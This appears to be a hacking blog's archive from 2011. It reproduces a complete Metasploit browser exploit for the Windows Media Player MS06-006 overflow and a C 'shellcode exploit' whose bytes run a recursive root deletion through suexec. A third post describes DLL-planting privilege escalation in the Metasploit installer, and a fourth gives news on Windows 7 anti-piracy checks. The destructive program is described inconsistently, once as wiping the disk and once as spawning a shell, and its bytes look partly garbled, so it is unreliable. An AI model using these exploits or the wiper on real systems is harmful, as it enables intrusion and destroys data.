BlackGolem Research Facility Blog: vulnerabilities

Showing posts with label vulnerabilities. Show all posts

Monday, March 14, 2011

Microsoft Windows Media Player Plugin Remote Code Execution Exploit (MS06-006)

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::wmp_plugin_ms06_006;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;
my $advanced =
{
'Gzip' => [1, 'Enable gzip content encoding'],
'Chunked' => [1, 'Enable chunked transfer encoding'],
};
my $info =
{
'Name' => 'Windows Media Player Plugin MS06-006 Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' =>
[
'H D Moore <hdm [at] metasploit.com',
],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits a vulnerability in the Windows Media Player pluginfor non-Microsoft web browsers. This module has been tested with Windows
Media Player 9 on Windows 2000 SP4, Windows XP SP2, and Windows 2003 SP0(Firefox 1.5 and Opera 8.5).
}),
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winxp', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'process', 'GETPCTYPE' => 'ecx' },
'UserOpts' =>
{
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
'REALHOST' => [ 0, 'HOST', 'External address to use for redirects (NAT)' ],
},
'Payload' =>
{
# give some stack space, align esp
'Space' => 1024,
'BadChars' => "\x00\x22".join('', map { $_=chr($_) } (0x80 .. 0xff)),
'MinNops' => 0,
'MaxNops' => 0,
},
'Refs' =>
[
['CVE', '2006-0005'],
['OSVDB', '23132'],
['MSB', 'MS06-006'],
['BID', '15130'],
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'Automatic - WMP 9.0', 0x07694b1e ]
],
'Keys' => [ 'wmp' ],
'DisclosureDate' => 'Feb 14 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit
{
my $self = shift;
my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('HTTPHOST'),
LocalPort => $self->GetVar('HTTPPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp'
);
my $client;
# Did the listener create fail?
if (not defined($server)) {
$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
return;
}
my $httphost = $self->GetVar('HTTPHOST');
$httphost = Pex::Utils::SourceIP('1.2.3.4') if $httphost eq '0.0.0.0';

$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
while (defined($client = $server->accept())) {
$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
}
return;
}
sub HandleHttpClient
{
my $self = shift;
my $fd = shift;
# Set the remote host information
my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);

# Read the HTTP command
my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
my $agent;
# Read in the HTTP headers
while ((my $line = $fd->RecvLine(10))) {

$line =~ s/^\s+|\s+$//g;
my ($var, $val) = split(/\:/, $line, 2);
# Break out if we reach the end of the headers
last if (not defined($var) or not defined($val));

$agent = $val if $var =~ /User-Agent/i;
}

my $addr;
##
# XXX Does not detect Windows SP levels or WMP version :-(
##
# Windows NT and Windows 2000 systems
if ($agent =~ /Windows NT [45]\.0/) {
$self->PrintLine("[*] Targetting WMP v9 on NT/2000...");
$addr = 0x07694b1e; # wmp.dll v9.00.00.2980
}
# Windows XP SP2
if ($agent =~ /Windows NT 5\.1/) {
$self->PrintLine("[*] Targetting WMP v9 on XP SP2..."); 
$addr = 0x4b5d5c74; # wmp.dll v9.00.00.3250
}
# Windows 2003 SP0
if ($agent =~ /Windows NT 5\.2/) {
$self->PrintLine("[*] Targetting WMP v9 on 2003 SP0..."); 
$addr = 0x585a6052; # wmp.dll v9.00.00.2991
} 

my $target = $self->Targets->[$self->GetVar('TARGET')];
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $pattern = "C" x 4000;

$addr = $target->[1] if ! $addr;
# We can't use SEH getpc from inside a SEH handler on XP SP2 >:(
# So we do it like a drunk ninja.
my $getpc = "\x58\x58\x58". # pop eax, pop eax, pop eax
"\x05\x18\x29\x29\x29". # add eax,0x29292917
"\x2d\x01\x29\x29\x29". # sub eax,0x29292901
"\x50\x59"; # push eax, pop ecx

substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr] 
substr($pattern, 2086, 4, pack('V', $addr));
substr($pattern, 2090, length($getpc), $getpc);
substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);
my $content = "<html><body><embed type=\"application/x-mplayer2\" src=\"$pattern.wmv\"></body></html>";

$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload...");

$fd->Send($self->BuildResponse($content));
# Prevents IE from throwing an error in some cases
select(undef, undef, undef, 0.1);

$fd->Close();
}
sub RandomHeaders {
my $self = shift;
my $head = '';
while (length($head) < 3072) {
$head .= "X-" .
Pex::Text::AlphaNumText(int(rand(30) + 5)) . ': ' .
Pex::Text::AlphaNumText(int(rand(256) + 5)) ."\r\n";
}
return $head;
}

sub BuildResponse {
my ($self, $content) = @_;
my $response =
"HTTP/1.1 200 OK\r\n" .
$self->RandomHeaders() .
"Content-Type: text/html\r\n";
if ($self->GetVar('Gzip')) {
$response .= "Content-Encoding: gzip\r\n";
$content = $self->Gzip($content);
}
if ($self->GetVar('Chunked')) {
$response .= "Transfer-Encoding: chunked\r\n";
$content = $self->Chunk($content);
} else {
$response .= 'Content-Length: ' . length($content) . "\r\n" .
"Connection: close\r\n";
}

$response .= "\r\n" . $content;
return $response;
}
sub Chunk {
my ($self, $content) = @_;
my $chunked;
while (length($content)) {
my $chunk = substr($content, 0, int(rand(10) + 1), '');
$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
}
$chunked .= "0\r\n\r\n";
return $chunked;
}
sub Gzip {
my $self = shift;
my $data = shift;
my $comp = int(rand(5))+5;
my($wtr, $rdr, $err);
my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
print $wtr $data;
close ($wtr);
local $/;
return (<$rdr>);
}
1;

small shellcode exploit

DONT EXECUTE THIS CODE
IT WILL DELETE EVERYTHING ON ITS PATH

/* tested on Suse linux*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* simple shellcode for linux/x86 */
char shellcode[] =
"\x31\x0b\x60\x72\x6d\x20\x2d\x72\x66\x20\x32\x3e"
"\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x2f\x20"
"\x26\x60\xcd\x80\x2fbin\x2fsh0xbfffc260";

int main ()
{
char buf[400];

sprintf(buf,"/usr/sbin/suexec %s",shellcode);
system(buf);

}

it's a pretty small exploit that appends the shell code to suexec and executes it you can easy test the shell code it executes /bin/sh

Friday, March 4, 2011

Metasploit Framework 3.5.1 Local Privilege Escalation Vulnerability

Metasploit Project is developed by a group of skilled security researchers to provide people all over the world with penetration testing resources. The popular open source program Metasploit Framework, has been much improved since its early days, beating even commercial softwares.

Metasploit programs such as Metasploit Framework, Express and Pro are tools designed to perform penetration tests on different platforms, using different exploitation techniques and a large database of exploit codes with the goal to identify potentially exploitable flaws on clients and servers and give system administrators the opportunity to patch before the bad guys exploit them.

A local privilege escalation vulnerability exists in the Metasploit Framework 3.5.1 software on Windows systems, because the installer by default copies all the files to a folder (framework) in the root directory and does not enforce ACLs to prevent restricted users from writting files. The ACLs for directories created in the root drive by default permits restricted users to create folders and files in all subfolders.

By placing a DLL file in the %systemdrive%\framework\postgresql\bin it is possible to get it loaded by a program (postgres.exe) that is executed by the frameworkPostgreSQL´s service executable (pg_ctl.exe), every time the service starts, with NT AUTHORITY\SYSTEM user privileges, being able to run arbitrary code in the local system. Notice the service startup is set to automatic by default.

Possible Dll names :

- dnsapi.dll (warning: causes the service to be terminated silently)

- rasadhlp.dll

- hnetcfg.dll

Others exist but have not been tested.

Tested on Windows XP SP3 and Windows 7

References
http://blog.metasploit.com/2011/02/metasploit-framework-352-released.html
http://www.secumania.net/
http://secunia.com/advisories/43166/
http://www.securityf.../bid/46300/info

Tuesday, March 1, 2011

Windows 7 hacking vulnerabilities to get fixed

Bad news for you software pirates. In the coming days, Microsoft is updating Windows 7 so it detects more than 70 known hacks and notifies users if their operating system is pirated.

The update to Windows Activation Technologies is voluntary. And it won’t lock users out of their computer if Windows 7 isn’t genuine. But Microsoft’s aim is to notify people who may not know their OS is a hacked copy.

How could that happen? If you purchased Windows 7 from an unfamiliar Web site – or even via, say, Craigslist – instead of an authorized dealer, there’s a risk your copy isn’t genuine. It could have been hacked, or messed with as to bypass or compromise Windows’ software activation system.

Pirated software is everywhere – and Microsoft hates it, of course, because they don’t get your money. Oh, and because of that security thing.

How does it work? Once installed, the update protects customers by identifying known activation exploits that may affect their PC experience. If any activation exploits are found, Windows will alert the customer and offer options for resolving the issue – in many cases, with just a few clicks. Machines running genuine Windows 7 software with no activation exploits will see nothing – the update runs quietly in the background protecting your system.

Microsoft will make the update available at microsoft.com/genuine on Tuesday and at the Microsoft Download Center on Wednesday. It will be listed as an “important” update through Windows Update later this month, Joe Williams, general manager of Genuine Windows, wrote in a blog post Thursday. The update also will be available for Windows Server, but via the Microsoft Update Catalog instead of Windows Server Update Services.

“I’d like to stress that the update is voluntary, which means that you can choose not to install it when you see it appear on Windows Update,” Williams wrote. “I also want to stress that installing this update will not jeopardize your privacy; although the update contacts Microsoft’s servers to check for new threats … the information we receive from PCs during these checks does not include any personally identifiable information or any other information that Microsoft can use to identify or contact you.”
Apparently, the update can be uninstalled at any time.
From the Genuine Windows blog post:

If Windows 7 is non-genuine, the notifications built into Windows 7 will inform the customer that Windows is not genuine by displaying informational dialog boxes with options for the customer to either get more information, or acquire genuine Windows. The desktop wallpaper will be switched to a plain desktop (all of the customer’s desktop icons, gadgets, or pinned applications stay in place). Periodic reminders and a persistent desktop watermark act as further alerts to the customer.

BlackGolem Research Facility Blog